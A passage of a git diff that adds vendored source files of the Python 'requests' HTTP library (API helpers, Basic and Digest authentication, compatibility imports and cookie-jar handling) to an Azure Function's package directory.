skip_host = "Host" in request.headers + low_conn.putrequest( + request.method, + url, + skip_accept_encoding=True, + skip_host=skip_host, + ) + + for header, value in request.headers.items(): + low_conn.putheader(header, value) + + low_conn.endheaders() + + for i in request.body: + low_conn.send(hex(len(i))[2:].encode("utf-8")) + low_conn.send(b"\r\n") + low_conn.send(i) + low_conn.send(b"\r\n") + low_conn.send(b"0\r\n\r\n") + + # Receive the response from the server + r = low_conn.getresponse() + + resp = HTTPResponse.from_httplib( + r, + pool=conn, + connection=low_conn, + preload_content=False, + decode_content=False, + ) + except Exception: + # If we hit any problems here, clean up the connection. + # Then, raise so that we can handle the actual exception. + low_conn.close() + raise + + except (ProtocolError, OSError) as err: + raise ConnectionError(err, request=request) + + except MaxRetryError as e: + if isinstance(e.reason, ConnectTimeoutError): + # TODO: Remove this in 3.0.0: see #2811 + if not isinstance(e.reason, NewConnectionError): + raise ConnectTimeout(e, request=request) + + if isinstance(e.reason, ResponseError): + raise RetryError(e, request=request) + + if isinstance(e.reason, _ProxyError): + raise ProxyError(e, request=request) + + if isinstance(e.reason, _SSLError): + # This branch is for urllib3 v1.22 and later. 
+ raise SSLError(e, request=request) + + raise ConnectionError(e, request=request) + + except ClosedPoolError as e: + raise ConnectionError(e, request=request) + + except _ProxyError as e: + raise ProxyError(e) + + except (_SSLError, _HTTPError) as e: + if isinstance(e, _SSLError): + # This branch is for urllib3 versions earlier than v1.22 + raise SSLError(e, request=request) + elif isinstance(e, ReadTimeoutError): + raise ReadTimeout(e, request=request) + elif isinstance(e, _InvalidHeader): + raise InvalidHeader(e, request=request) + else: + raise + + return self.build_response(request, resp) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py new file mode 100644 index 0000000..3341361 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/api.py @@ -0,0 +1,157 @@ +""" +requests.api +~~~~~~~~~~~~ + +This module implements the Requests API. + +:copyright: (c) 2012 by Kenneth Reitz. +:license: Apache2, see LICENSE for more details. +""" + +from . import sessions + + +def request(method, url, **kwargs): + """Constructs and sends a :class:`Request `. + + :param method: method for the new :class:`Request` object: ``GET``, ``OPTIONS``, ``HEAD``, ``POST``, ``PUT``, ``PATCH``, or ``DELETE``. + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary, list of tuples or bytes to send + in the query string for the :class:`Request`. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) A JSON serializable Python object to send in the body of the :class:`Request`. + :param headers: (optional) Dictionary of HTTP Headers to send with the :class:`Request`. + :param cookies: (optional) Dict or CookieJar object to send with the :class:`Request`. + :param files: (optional) Dictionary of ``'name': file-like-objects`` (or ``{'name': file-tuple}``) for multipart encoding upload. + ``file-tuple`` can be a 2-tuple ``('filename', fileobj)``, 3-tuple ``('filename', fileobj, 'content_type')`` + or a 4-tuple ``('filename', fileobj, 'content_type', custom_headers)``, where ``'content-type'`` is a string + defining the content type of the given file and ``custom_headers`` a dict-like object containing additional headers + to add for the file. + :param auth: (optional) Auth tuple to enable Basic/Digest/Custom HTTP Auth. + :param timeout: (optional) How many seconds to wait for the server to send data + before giving up, as a float, or a :ref:`(connect timeout, read + timeout) ` tuple. + :type timeout: float or tuple + :param allow_redirects: (optional) Boolean. Enable/disable GET/OPTIONS/POST/PUT/PATCH/DELETE/HEAD redirection. Defaults to ``True``. + :type allow_redirects: bool + :param proxies: (optional) Dictionary mapping protocol to the URL of the proxy. + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use. Defaults to ``True``. + :param stream: (optional) if ``False``, the response content will be immediately downloaded. + :param cert: (optional) if String, path to ssl client cert file (.pem). If Tuple, ('cert', 'key') pair. 
+ :return: :class:`Response ` object + :rtype: requests.Response + + Usage:: + + >>> import requests + >>> req = requests.request('GET', 'https://httpbin.org/get') + >>> req + + """ + + # By using the 'with' statement we are sure the session is closed, thus we + # avoid leaving sockets open which can trigger a ResourceWarning in some + # cases, and look like a memory leak in others. + with sessions.Session() as session: + return session.request(method=method, url=url, **kwargs) + + +def get(url, params=None, **kwargs): + r"""Sends a GET request. + + :param url: URL for the new :class:`Request` object. + :param params: (optional) Dictionary, list of tuples or bytes to send + in the query string for the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("get", url, params=params, **kwargs) + + +def options(url, **kwargs): + r"""Sends an OPTIONS request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("options", url, **kwargs) + + +def head(url, **kwargs): + r"""Sends a HEAD request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. If + `allow_redirects` is not provided, it will be set to `False` (as + opposed to the default :meth:`request` behavior). + :return: :class:`Response ` object + :rtype: requests.Response + """ + + kwargs.setdefault("allow_redirects", False) + return request("head", url, **kwargs) + + +def post(url, data=None, json=None, **kwargs): + r"""Sends a POST request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("post", url, data=data, json=json, **kwargs) + + +def put(url, data=None, **kwargs): + r"""Sends a PUT request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("put", url, data=data, **kwargs) + + +def patch(url, data=None, **kwargs): + r"""Sends a PATCH request. + + :param url: URL for the new :class:`Request` object. + :param data: (optional) Dictionary, list of tuples, bytes, or file-like + object to send in the body of the :class:`Request`. + :param json: (optional) json data to send in the body of the :class:`Request`. + :param \*\*kwargs: Optional arguments that ``request`` takes. + :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("patch", url, data=data, **kwargs) + + +def delete(url, **kwargs): + r"""Sends a DELETE request. + + :param url: URL for the new :class:`Request` object. + :param \*\*kwargs: Optional arguments that ``request`` takes. 
+ :return: :class:`Response ` object + :rtype: requests.Response + """ + + return request("delete", url, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py new file mode 100644 index 0000000..bba117e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/auth.py @@ -0,0 +1,315 @@ +""" +requests.auth +~~~~~~~~~~~~~ + +This module contains the authentication handlers for Requests. +""" + +import hashlib +import os +import re +import threading +import time +import warnings +from base64 import b64encode + +from ._internal_utils import to_native_string +from .compat import basestring, str, urlparse +from .cookies import extract_cookies_to_jar +from .utils import parse_dict_header + +CONTENT_TYPE_FORM_URLENCODED = "application/x-www-form-urlencoded" +CONTENT_TYPE_MULTI_PART = "multipart/form-data" + + +def _basic_auth_str(username, password): + """Returns a Basic Auth string.""" + + # "I want us to put a big-ol' comment on top of it that + # says that this behaviour is dumb but we need to preserve + # it because people are relying on it." + # - Lukasa + # + # These are here solely to maintain backwards compatibility + # for things like ints. This will be removed in 3.0.0. + if not isinstance(username, basestring): + warnings.warn( + "Non-string usernames will no longer be supported in Requests " + "3.0.0. Please convert the object you've passed in ({!r}) to " + "a string or bytes object in the near future to avoid " + "problems.".format(username), + category=DeprecationWarning, + ) + username = str(username) + + if not isinstance(password, basestring): + warnings.warn( + "Non-string passwords will no longer be supported in Requests " + "3.0.0. 
Please convert the object you've passed in ({!r}) to " + "a string or bytes object in the near future to avoid " + "problems.".format(type(password)), + category=DeprecationWarning, + ) + password = str(password) + # -- End Removal -- + + if isinstance(username, str): + username = username.encode("latin1") + + if isinstance(password, str): + password = password.encode("latin1") + + authstr = "Basic " + to_native_string( + b64encode(b":".join((username, password))).strip() + ) + + return authstr + + +class AuthBase: + """Base class that all auth implementations derive from""" + + def __call__(self, r): + raise NotImplementedError("Auth hooks must be callable.") + + +class HTTPBasicAuth(AuthBase): + """Attaches HTTP Basic Authentication to the given Request object.""" + + def __init__(self, username, password): + self.username = username + self.password = password + + def __eq__(self, other): + return all( + [ + self.username == getattr(other, "username", None), + self.password == getattr(other, "password", None), + ] + ) + + def __ne__(self, other): + return not self == other + + def __call__(self, r): + r.headers["Authorization"] = _basic_auth_str(self.username, self.password) + return r + + +class HTTPProxyAuth(HTTPBasicAuth): + """Attaches HTTP Proxy Authentication to a given Request object.""" + + def __call__(self, r): + r.headers["Proxy-Authorization"] = _basic_auth_str(self.username, self.password) + return r + + +class HTTPDigestAuth(AuthBase): + """Attaches HTTP Digest Authentication to the given Request object.""" + + def __init__(self, username, password): + self.username = username + self.password = password + # Keep state in per-thread local storage + self._thread_local = threading.local() + + def init_per_thread_state(self): + # Ensure state is initialized just once per-thread + if not hasattr(self._thread_local, "init"): + self._thread_local.init = True + self._thread_local.last_nonce = "" + self._thread_local.nonce_count = 0 + self._thread_local.chal = {} + self._thread_local.pos = None + self._thread_local.num_401_calls = None + + def build_digest_header(self, method, url): + """ + :rtype: str + """ + + realm = self._thread_local.chal["realm"] + nonce = self._thread_local.chal["nonce"] + qop = self._thread_local.chal.get("qop") + algorithm = self._thread_local.chal.get("algorithm") + opaque = self._thread_local.chal.get("opaque") + hash_utf8 = None + + if algorithm is None: + _algorithm = "MD5" + else: + _algorithm = algorithm.upper() + # lambdas assume digest modules are imported at the top level + if _algorithm == "MD5" or _algorithm == "MD5-SESS": + + def md5_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.md5(x).hexdigest() + + hash_utf8 = md5_utf8 + elif _algorithm == "SHA": + + def sha_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha1(x).hexdigest() + + hash_utf8 = sha_utf8 + elif _algorithm == "SHA-256": + + def sha256_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha256(x).hexdigest() + + hash_utf8 = sha256_utf8 + elif _algorithm == "SHA-512": + + def sha512_utf8(x): + if isinstance(x, str): + x = x.encode("utf-8") + return hashlib.sha512(x).hexdigest() + + hash_utf8 = sha512_utf8 + + KD = lambda s, d: hash_utf8(f"{s}:{d}") # noqa:E731 + + if hash_utf8 is None: + return None + + # XXX not implemented yet + entdig = None + p_parsed = urlparse(url) + #: path is request-uri defined in RFC 2616 which should not be empty + path = p_parsed.path or "/" + if p_parsed.query: + path += 
f"?{p_parsed.query}" + + A1 = f"{self.username}:{realm}:{self.password}" + A2 = f"{method}:{path}" + + HA1 = hash_utf8(A1) + HA2 = hash_utf8(A2) + + if nonce == self._thread_local.last_nonce: + self._thread_local.nonce_count += 1 + else: + self._thread_local.nonce_count = 1 + ncvalue = f"{self._thread_local.nonce_count:08x}" + s = str(self._thread_local.nonce_count).encode("utf-8") + s += nonce.encode("utf-8") + s += time.ctime().encode("utf-8") + s += os.urandom(8) + + cnonce = hashlib.sha1(s).hexdigest()[:16] + if _algorithm == "MD5-SESS": + HA1 = hash_utf8(f"{HA1}:{nonce}:{cnonce}") + + if not qop: + respdig = KD(HA1, f"{nonce}:{HA2}") + elif qop == "auth" or "auth" in qop.split(","): + noncebit = f"{nonce}:{ncvalue}:{cnonce}:auth:{HA2}" + respdig = KD(HA1, noncebit) + else: + # XXX handle auth-int. + return None + + self._thread_local.last_nonce = nonce + + # XXX should the partial digests be encoded too? + base = ( + f'username="{self.username}", realm="{realm}", nonce="{nonce}", ' + f'uri="{path}", response="{respdig}"' + ) + if opaque: + base += f', opaque="{opaque}"' + if algorithm: + base += f', algorithm="{algorithm}"' + if entdig: + base += f', digest="{entdig}"' + if qop: + base += f', qop="auth", nc={ncvalue}, cnonce="{cnonce}"' + + return f"Digest {base}" + + def handle_redirect(self, r, **kwargs): + """Reset num_401_calls counter on redirects.""" + if r.is_redirect: + self._thread_local.num_401_calls = 1 + + def handle_401(self, r, **kwargs): + """ + Takes the given response and tries digest-auth, if needed. + + :rtype: requests.Response + """ + + # If response is not 4xx, do not auth + # See https://github.com/psf/requests/issues/3772 + if not 400 <= r.status_code < 500: + self._thread_local.num_401_calls = 1 + return r + + if self._thread_local.pos is not None: + # Rewind the file position indicator of the body to where + # it was to resend the request. + r.request.body.seek(self._thread_local.pos) + s_auth = r.headers.get("www-authenticate", "") + + if "digest" in s_auth.lower() and self._thread_local.num_401_calls < 2: + + self._thread_local.num_401_calls += 1 + pat = re.compile(r"digest ", flags=re.IGNORECASE) + self._thread_local.chal = parse_dict_header(pat.sub("", s_auth, count=1)) + + # Consume content and release the original connection + # to allow our new request to reuse the same one. + r.content + r.close() + prep = r.request.copy() + extract_cookies_to_jar(prep._cookies, r.request, r.raw) + prep.prepare_cookies(prep._cookies) + + prep.headers["Authorization"] = self.build_digest_header( + prep.method, prep.url + ) + _r = r.connection.send(prep, **kwargs) + _r.history.append(r) + _r.request = prep + + return _r + + self._thread_local.num_401_calls = 1 + return r + + def __call__(self, r): + # Initialize per-thread state, if needed + self.init_per_thread_state() + # If we have a saved nonce, skip the 401 + if self._thread_local.last_nonce: + r.headers["Authorization"] = self.build_digest_header(r.method, r.url) + try: + self._thread_local.pos = r.body.tell() + except AttributeError: + # In the case of HTTPDigestAuth being reused and the body of + # the previous request was a file-like object, pos has the + # file position of the previous body. Ensure it's set to + # None. 
+ self._thread_local.pos = None + r.register_hook("response", self.handle_401) + r.register_hook("response", self.handle_redirect) + self._thread_local.num_401_calls = 1 + + return r + + def __eq__(self, other): + return all( + [ + self.username == getattr(other, "username", None), + self.password == getattr(other, "password", None), + ] + ) + + def __ne__(self, other): + return not self == other diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py new file mode 100644 index 0000000..34e177f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/certs.py @@ -0,0 +1,17 @@ +#!/usr/bin/env python + +""" +requests.certs +~~~~~~~~~~~~~~ + +This module returns the preferred default CA certificate bundle. There is +only one — the one from the certifi package. + +If you are packaging Requests, e.g., for a Linux distribution or a managed +environment, you can change the definition of where() to return a separately +packaged CA bundle. +""" +from certifi import where + +if __name__ == "__main__": + print(where()) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py new file mode 100644 index 0000000..b0f3f30 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/compat.py @@ -0,0 +1,79 @@ +""" +requests.compat +~~~~~~~~~~~~~~~ + +This module previously handled import compatibility issues +between Python 2 and Python 3. It remains for backwards +compatibility until the next major version. +""" + +try: + import chardet +except ImportError: + import charset_normalizer as chardet + +import sys + +# ------- +# Pythons +# ------- + +# Syntax sugar. +_ver = sys.version_info + +#: Python 2.x? +is_py2 = _ver[0] == 2 + +#: Python 3.x? +is_py3 = _ver[0] == 3 + +# json/simplejson module import resolution +has_simplejson = False +try: + import simplejson as json + + has_simplejson = True +except ImportError: + import json + +if has_simplejson: + from simplejson import JSONDecodeError +else: + from json import JSONDecodeError + +# Keep OrderedDict for backwards compatibility. 
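`certs.py` is intentionally tiny: `where()` is re-exported from certifi precisely so that packagers can swap in a system bundle. A quick sketch of what it returns:

```python
import requests.certs

# Path to the CA bundle requests verifies TLS against by default.
ca_bundle = requests.certs.where()
print(ca_bundle)  # typically .../certifi/cacert.pem

# The same value can be passed explicitly, e.g. when pinning a bundle:
# requests.get("https://example.com", verify=ca_bundle)
```

Running `python -m requests.certs` prints the same path via the module's `__main__` guard.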
+from collections import OrderedDict +from collections.abc import Callable, Mapping, MutableMapping +from http import cookiejar as cookielib +from http.cookies import Morsel +from io import StringIO + +# -------------- +# Legacy Imports +# -------------- +from urllib.parse import ( + quote, + quote_plus, + unquote, + unquote_plus, + urldefrag, + urlencode, + urljoin, + urlparse, + urlsplit, + urlunparse, +) +from urllib.request import ( + getproxies, + getproxies_environment, + parse_http_list, + proxy_bypass, + proxy_bypass_environment, +) + +builtin_str = str +str = str +bytes = bytes +basestring = (str, bytes) +numeric_types = (int, float) +integer_types = (int,) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py new file mode 100644 index 0000000..ebecc89 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/cookies.py @@ -0,0 +1,561 @@ +""" +requests.cookies +~~~~~~~~~~~~~~~~ + +Compatibility code to be able to use `cookielib.CookieJar` with requests. + +requests.utils imports from here, so be careful with imports. +""" + +import calendar +import copy +import time + +from ._internal_utils import to_native_string +from .compat import Morsel, MutableMapping, cookielib, urlparse, urlunparse + +try: + import threading +except ImportError: + import dummy_threading as threading + + +class MockRequest: + """Wraps a `requests.Request` to mimic a `urllib2.Request`. + + The code in `cookielib.CookieJar` expects this interface in order to correctly + manage cookie policies, i.e., determine whether a cookie can be set, given the + domains of the request and the cookie. + + The original request object is read-only. The client is responsible for collecting + the new headers via `get_new_headers()` and interpreting them appropriately. You + probably want `get_cookie_header`, defined below. 
+ """ + + def __init__(self, request): + self._r = request + self._new_headers = {} + self.type = urlparse(self._r.url).scheme + + def get_type(self): + return self.type + + def get_host(self): + return urlparse(self._r.url).netloc + + def get_origin_req_host(self): + return self.get_host() + + def get_full_url(self): + # Only return the response's URL if the user hadn't set the Host + # header + if not self._r.headers.get("Host"): + return self._r.url + # If they did set it, retrieve it and reconstruct the expected domain + host = to_native_string(self._r.headers["Host"], encoding="utf-8") + parsed = urlparse(self._r.url) + # Reconstruct the URL as we expect it + return urlunparse( + [ + parsed.scheme, + host, + parsed.path, + parsed.params, + parsed.query, + parsed.fragment, + ] + ) + + def is_unverifiable(self): + return True + + def has_header(self, name): + return name in self._r.headers or name in self._new_headers + + def get_header(self, name, default=None): + return self._r.headers.get(name, self._new_headers.get(name, default)) + + def add_header(self, key, val): + """cookielib has no legitimate use for this method; add it back if you find one.""" + raise NotImplementedError( + "Cookie headers should be added with add_unredirected_header()" + ) + + def add_unredirected_header(self, name, value): + self._new_headers[name] = value + + def get_new_headers(self): + return self._new_headers + + @property + def unverifiable(self): + return self.is_unverifiable() + + @property + def origin_req_host(self): + return self.get_origin_req_host() + + @property + def host(self): + return self.get_host() + + +class MockResponse: + """Wraps a `httplib.HTTPMessage` to mimic a `urllib.addinfourl`. + + ...what? Basically, expose the parsed HTTP headers from the server response + the way `cookielib` expects to see them. + """ + + def __init__(self, headers): + """Make a MockResponse for `cookielib` to read. + + :param headers: a httplib.HTTPMessage or analogous carrying the headers + """ + self._headers = headers + + def info(self): + return self._headers + + def getheaders(self, name): + self._headers.getheaders(name) + + +def extract_cookies_to_jar(jar, request, response): + """Extract the cookies from the response into a CookieJar. + + :param jar: cookielib.CookieJar (not necessarily a RequestsCookieJar) + :param request: our own requests.Request object + :param response: urllib3.HTTPResponse object + """ + if not (hasattr(response, "_original_response") and response._original_response): + return + # the _original_response field is the wrapped httplib.HTTPResponse object, + req = MockRequest(request) + # pull out the HTTPMessage with the headers and put it in the mock: + res = MockResponse(response._original_response.msg) + jar.extract_cookies(res, req) + + +def get_cookie_header(jar, request): + """ + Produce an appropriate Cookie header string to be sent with `request`, or None. + + :rtype: str + """ + r = MockRequest(request) + jar.add_cookie_header(r) + return r.get_new_headers().get("Cookie") + + +def remove_cookie_by_name(cookiejar, name, domain=None, path=None): + """Unsets a cookie by name, by default over all domains and paths. + + Wraps CookieJar.clear(), is O(n). 
+ """ + clearables = [] + for cookie in cookiejar: + if cookie.name != name: + continue + if domain is not None and domain != cookie.domain: + continue + if path is not None and path != cookie.path: + continue + clearables.append((cookie.domain, cookie.path, cookie.name)) + + for domain, path, name in clearables: + cookiejar.clear(domain, path, name) + + +class CookieConflictError(RuntimeError): + """There are two cookies that meet the criteria specified in the cookie jar. + Use .get and .set and include domain and path args in order to be more specific. + """ + + +class RequestsCookieJar(cookielib.CookieJar, MutableMapping): + """Compatibility class; is a cookielib.CookieJar, but exposes a dict + interface. + + This is the CookieJar we create by default for requests and sessions that + don't specify one, since some clients may expect response.cookies and + session.cookies to support dict operations. + + Requests does not use the dict interface internally; it's just for + compatibility with external client code. All requests code should work + out of the box with externally provided instances of ``CookieJar``, e.g. + ``LWPCookieJar`` and ``FileCookieJar``. + + Unlike a regular CookieJar, this class is pickleable. + + .. warning:: dictionary operations that are normally O(1) may be O(n). + """ + + def get(self, name, default=None, domain=None, path=None): + """Dict-like get() that also supports optional domain and path args in + order to resolve naming collisions from using one cookie jar over + multiple domains. + + .. warning:: operation is O(n), not O(1). + """ + try: + return self._find_no_duplicates(name, domain, path) + except KeyError: + return default + + def set(self, name, value, **kwargs): + """Dict-like set() that also supports optional domain and path args in + order to resolve naming collisions from using one cookie jar over + multiple domains. + """ + # support client code that unsets cookies by assignment of a None value: + if value is None: + remove_cookie_by_name( + self, name, domain=kwargs.get("domain"), path=kwargs.get("path") + ) + return + + if isinstance(value, Morsel): + c = morsel_to_cookie(value) + else: + c = create_cookie(name, value, **kwargs) + self.set_cookie(c) + return c + + def iterkeys(self): + """Dict-like iterkeys() that returns an iterator of names of cookies + from the jar. + + .. seealso:: itervalues() and iteritems(). + """ + for cookie in iter(self): + yield cookie.name + + def keys(self): + """Dict-like keys() that returns a list of names of cookies from the + jar. + + .. seealso:: values() and items(). + """ + return list(self.iterkeys()) + + def itervalues(self): + """Dict-like itervalues() that returns an iterator of values of cookies + from the jar. + + .. seealso:: iterkeys() and iteritems(). + """ + for cookie in iter(self): + yield cookie.value + + def values(self): + """Dict-like values() that returns a list of values of cookies from the + jar. + + .. seealso:: keys() and items(). + """ + return list(self.itervalues()) + + def iteritems(self): + """Dict-like iteritems() that returns an iterator of name-value tuples + from the jar. + + .. seealso:: iterkeys() and itervalues(). + """ + for cookie in iter(self): + yield cookie.name, cookie.value + + def items(self): + """Dict-like items() that returns a list of name-value tuples from the + jar. Allows client-code to call ``dict(RequestsCookieJar)`` and get a + vanilla python dict of key value pairs. + + .. seealso:: keys() and values(). 
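The dict-style accessors above exist purely for client convenience; the `domain` and `path` keywords are what disambiguate same-named cookies. A short sketch (cookie names and domains are made up):

```python
from requests.cookies import CookieConflictError, RequestsCookieJar

jar = RequestsCookieJar()
jar.set("session", "abc123", domain="example.com", path="/")
jar.set("session", "xyz789", domain="other.example", path="/")

# get() with domain/path resolves the collision explicitly.
print(jar.get("session", domain="example.com"))  # 'abc123'

try:
    jar["session"]  # ambiguous: two cookies share the name
except CookieConflictError as exc:
    print("conflict:", exc)
```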
+ """ + return list(self.iteritems()) + + def list_domains(self): + """Utility method to list all the domains in the jar.""" + domains = [] + for cookie in iter(self): + if cookie.domain not in domains: + domains.append(cookie.domain) + return domains + + def list_paths(self): + """Utility method to list all the paths in the jar.""" + paths = [] + for cookie in iter(self): + if cookie.path not in paths: + paths.append(cookie.path) + return paths + + def multiple_domains(self): + """Returns True if there are multiple domains in the jar. + Returns False otherwise. + + :rtype: bool + """ + domains = [] + for cookie in iter(self): + if cookie.domain is not None and cookie.domain in domains: + return True + domains.append(cookie.domain) + return False # there is only one domain in jar + + def get_dict(self, domain=None, path=None): + """Takes as an argument an optional domain and path and returns a plain + old Python dict of name-value pairs of cookies that meet the + requirements. + + :rtype: dict + """ + dictionary = {} + for cookie in iter(self): + if (domain is None or cookie.domain == domain) and ( + path is None or cookie.path == path + ): + dictionary[cookie.name] = cookie.value + return dictionary + + def __contains__(self, name): + try: + return super().__contains__(name) + except CookieConflictError: + return True + + def __getitem__(self, name): + """Dict-like __getitem__() for compatibility with client code. Throws + exception if there are more than one cookie with name. In that case, + use the more explicit get() method instead. + + .. warning:: operation is O(n), not O(1). + """ + return self._find_no_duplicates(name) + + def __setitem__(self, name, value): + """Dict-like __setitem__ for compatibility with client code. Throws + exception if there is already a cookie of that name in the jar. In that + case, use the more explicit set() method instead. + """ + self.set(name, value) + + def __delitem__(self, name): + """Deletes a cookie given a name. Wraps ``cookielib.CookieJar``'s + ``remove_cookie_by_name()``. + """ + remove_cookie_by_name(self, name) + + def set_cookie(self, cookie, *args, **kwargs): + if ( + hasattr(cookie.value, "startswith") + and cookie.value.startswith('"') + and cookie.value.endswith('"') + ): + cookie.value = cookie.value.replace('\\"', "") + return super().set_cookie(cookie, *args, **kwargs) + + def update(self, other): + """Updates this jar with cookies from another CookieJar or dict-like""" + if isinstance(other, cookielib.CookieJar): + for cookie in other: + self.set_cookie(copy.copy(cookie)) + else: + super().update(other) + + def _find(self, name, domain=None, path=None): + """Requests uses this method internally to get cookie values. + + If there are conflicting cookies, _find arbitrarily chooses one. + See _find_no_duplicates if you want an exception thrown if there are + conflicting cookies. + + :param name: a string containing name of cookie + :param domain: (optional) string containing domain of cookie + :param path: (optional) string containing path of cookie + :return: cookie.value + """ + for cookie in iter(self): + if cookie.name == name: + if domain is None or cookie.domain == domain: + if path is None or cookie.path == path: + return cookie.value + + raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") + + def _find_no_duplicates(self, name, domain=None, path=None): + """Both ``__get_item__`` and ``get`` call this function: it's never + used elsewhere in Requests. 
+ + :param name: a string containing name of cookie + :param domain: (optional) string containing domain of cookie + :param path: (optional) string containing path of cookie + :raises KeyError: if cookie is not found + :raises CookieConflictError: if there are multiple cookies + that match name and optionally domain and path + :return: cookie.value + """ + toReturn = None + for cookie in iter(self): + if cookie.name == name: + if domain is None or cookie.domain == domain: + if path is None or cookie.path == path: + if toReturn is not None: + # if there are multiple cookies that meet passed in criteria + raise CookieConflictError( + f"There are multiple cookies with name, {name!r}" + ) + # we will eventually return this as long as no cookie conflict + toReturn = cookie.value + + if toReturn: + return toReturn + raise KeyError(f"name={name!r}, domain={domain!r}, path={path!r}") + + def __getstate__(self): + """Unlike a normal CookieJar, this class is pickleable.""" + state = self.__dict__.copy() + # remove the unpickleable RLock object + state.pop("_cookies_lock") + return state + + def __setstate__(self, state): + """Unlike a normal CookieJar, this class is pickleable.""" + self.__dict__.update(state) + if "_cookies_lock" not in self.__dict__: + self._cookies_lock = threading.RLock() + + def copy(self): + """Return a copy of this RequestsCookieJar.""" + new_cj = RequestsCookieJar() + new_cj.set_policy(self.get_policy()) + new_cj.update(self) + return new_cj + + def get_policy(self): + """Return the CookiePolicy instance used.""" + return self._policy + + +def _copy_cookie_jar(jar): + if jar is None: + return None + + if hasattr(jar, "copy"): + # We're dealing with an instance of RequestsCookieJar + return jar.copy() + # We're dealing with a generic CookieJar instance + new_jar = copy.copy(jar) + new_jar.clear() + for cookie in jar: + new_jar.set_cookie(copy.copy(cookie)) + return new_jar + + +def create_cookie(name, value, **kwargs): + """Make a cookie from underspecified parameters. + + By default, the pair of `name` and `value` will be set for the domain '' + and sent on every request (this is sometimes called a "supercookie"). 
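Because `create_cookie` defaults the domain to `''`, callers that care about scoping should pass it explicitly, as in this illustrative snippet:

```python
from requests.cookies import RequestsCookieJar, create_cookie

jar = RequestsCookieJar()
jar.set_cookie(
    create_cookie(
        "token",
        "s3cr3t",
        domain="example.com",  # avoid the '' "supercookie" default
        path="/api",
        secure=True,
    )
)
print(jar.get("token", domain="example.com", path="/api"))  # 's3cr3t'
```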
+ """ + result = { + "version": 0, + "name": name, + "value": value, + "port": None, + "domain": "", + "path": "/", + "secure": False, + "expires": None, + "discard": True, + "comment": None, + "comment_url": None, + "rest": {"HttpOnly": None}, + "rfc2109": False, + } + + badargs = set(kwargs) - set(result) + if badargs: + raise TypeError( + f"create_cookie() got unexpected keyword arguments: {list(badargs)}" + ) + + result.update(kwargs) + result["port_specified"] = bool(result["port"]) + result["domain_specified"] = bool(result["domain"]) + result["domain_initial_dot"] = result["domain"].startswith(".") + result["path_specified"] = bool(result["path"]) + + return cookielib.Cookie(**result) + + +def morsel_to_cookie(morsel): + """Convert a Morsel object into a Cookie containing the one k/v pair.""" + + expires = None + if morsel["max-age"]: + try: + expires = int(time.time() + int(morsel["max-age"])) + except ValueError: + raise TypeError(f"max-age: {morsel['max-age']} must be integer") + elif morsel["expires"]: + time_template = "%a, %d-%b-%Y %H:%M:%S GMT" + expires = calendar.timegm(time.strptime(morsel["expires"], time_template)) + return create_cookie( + comment=morsel["comment"], + comment_url=bool(morsel["comment"]), + discard=False, + domain=morsel["domain"], + expires=expires, + name=morsel.key, + path=morsel["path"], + port=None, + rest={"HttpOnly": morsel["httponly"]}, + rfc2109=False, + secure=bool(morsel["secure"]), + value=morsel.value, + version=morsel["version"] or 0, + ) + + +def cookiejar_from_dict(cookie_dict, cookiejar=None, overwrite=True): + """Returns a CookieJar from a key/value dictionary. + + :param cookie_dict: Dict of key/values to insert into CookieJar. + :param cookiejar: (optional) A cookiejar to add the cookies to. + :param overwrite: (optional) If False, will not replace cookies + already in the jar with new ones. + :rtype: CookieJar + """ + if cookiejar is None: + cookiejar = RequestsCookieJar() + + if cookie_dict is not None: + names_from_jar = [cookie.name for cookie in cookiejar] + for name in cookie_dict: + if overwrite or (name not in names_from_jar): + cookiejar.set_cookie(create_cookie(name, cookie_dict[name])) + + return cookiejar + + +def merge_cookies(cookiejar, cookies): + """Add cookies to cookiejar and returns a merged CookieJar. + + :param cookiejar: CookieJar object to add the cookies to. + 